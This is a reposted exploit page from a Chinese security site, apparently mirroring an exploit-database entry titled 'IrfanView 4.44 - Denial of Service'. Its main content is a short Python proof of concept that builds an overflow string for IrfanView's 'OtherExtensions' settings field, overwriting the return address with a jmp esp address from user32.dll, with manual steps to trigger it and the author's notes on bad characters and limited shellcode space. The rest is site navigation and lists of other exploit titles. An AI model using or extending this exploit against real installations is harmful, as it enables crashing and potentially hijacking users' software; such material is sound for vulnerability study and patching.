首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IrfanView 4.44 - Denial of Service
来源:vfocus.net 作者:Orprecio 发布时间:2017-05-05  
# Exploit Title: Irfanview - OtherExtensions Input Overflow
# Date: 29-04-2017
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
# Exploit Author: Dreivan Orprecio
#Version: Irfanview 4.44
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
#Debugging Machine: WinXP Pro SP3 (32bit)
 
 
#POC
 
#!usr/bin/python
 
 
      eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll
 
 
 
      buffer = "OtherExtensions="+"A" *  199 + eip + "\xcc"
 
      print buffer              #a) irfanview->Option->Properties/Settings->Extensions
                                #b) Paste the buffer in the "other" input then press ok, repeat a) and b)
 
 
 
 
 
#badcharacters: those instruction that start with 6,7,8,E,F
#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
#Any other way around this?
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Panda Free Antivirus - 'PSKMAD
·Alerton Webtalk 2.5 / 3.3 - Mu
·Microsoft Internet Explorer 11
·MySQL < 5.6.35 / < 5.7.17 - In
·Simple File Uploader - Arbitra
·Ghostscript 9.21 - Type Confus
·TYPO3 News Module - SQL Inject
·Microsoft Internet Explorer 11
·Mercurial Custom hg-ssh Wrappe
·Serviio PRO 1.8 DLNA Media Str
·Oracle VirtualBox Guest Additi
·Serviio PRO 1.8 DLNA Media Str
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved